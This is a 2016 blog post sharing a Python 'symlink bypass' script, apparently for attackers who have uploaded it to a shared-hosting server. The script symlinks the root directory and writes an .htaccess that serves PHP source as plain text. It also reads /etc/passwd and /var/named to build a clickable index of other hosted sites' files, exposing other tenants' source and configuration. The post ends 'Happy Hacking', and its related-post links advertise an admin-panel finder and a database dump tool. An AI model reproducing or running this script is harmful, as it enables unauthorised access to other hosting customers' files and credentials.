Sunday, 21 August 2016

Symlink Bypass Script

    , , , , ,   1 comment 
So today I'll share the first useful script i coded .
It's a symlink script . unlike other symlink scripts this script doesn't need permission to read
/etc/named.conf
  • Usage
Usage is as simple as uploading the script and then executing
python script.py
  • Screenshots
kyuubi_symlink_python_virkid
Executed on server
kyuubi_symlink_python_virkid_1
Symlink Index
  • Code
?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#!/usr/bin/env python
#Symlink Script by VIRkid
#Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
#Version 1.1
#Minor fixes
#
#contact me @ MaDLeeTs
#StaY_MaD!
import os,sys,re
if not os.path.exists('kidsymx'):
     os.makedirs('kidsymx')
os.chdir('kidsymx')
hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
x=open('.htaccess','w')
x.write(hta)
x.close()
print '[+] htaccess created'
h="<html><head><title>kidSym</title><style>table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
<h1>
kidSym</h1>
<p class=menf>
VIRkid
greetz:4li , Phant0M_X , Ch3rn0by1 , kai</p>
<table >"
os.system("ln -s / kid.txt")
if os.path.exists('kid.txt'):
 print "[+] Symlink Created"
else:
 print "[-] Unable to Create Symlink"
usrs=[]
sitesx=[]
z=open("/etc/passwd","r")
z=z.read()
z=re.findall('/home\w*?/\w+',z)
for usr in z:
     usrs.append(usr)
 
sites=os.listdir("/var/named/")
for site in sites:
     site=site.replace(".db","")
     sitesx.append(site)
 
#php making
path=os.getcwd()
if "/public_html/" in path:
 path="/public_html/"
else:
 path="/html/"
counter=1
indx=open("kSym.php","w")
indx.write(h)
for userx in usrs:
     for sitex in sitesx:
          u=userx.split("/",2)[2][0:5]
          s=sitex[0:5]
          if u==s:
               indx.write("
<tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
               counter=counter+1
print "[+] Site index Complete"
 
print "[*] %s Sites found" %str(counter)
 
print "[+] Happy Hacking ./VIRkid"

Share This:    Facebook Twitter Google+ Stumble Digg

Related Posts:

  • MYSQL Db dump tool tbl-xtract Tbl-Xtract is a script to dump huge databases Quickly . It can dump 5 thousand records in one request (Quite fast huh ? ) . It also supports Post SQL… Read More
  • Kyuubi Reverse Admin Finder (Updated) Kyuubi is a Reverse Admin Finder . It finds all the domains on a specific host using yougetsignal and then tries to find the Admin Panels of the doma… Read More
  • sql2csv converter pythonThis script converts .sql files to .csv files so they’re easily readable . It also has the ability to simply list tables from .sql file and can also l… Read More
  • Symlink Bypass Script So today I'll share the first useful script i coded . It's a symlink script . unlike other symlink scripts this script doesn't need permission to r… Read More

1 comment:

  1. Unknown21 August 2016 at 10:48

    yr script to a6a ha dikhny me pr smj ku6 ni aya mjy ye ha kya

    ReplyDelete

Subscribe to: Post Comments (Atom)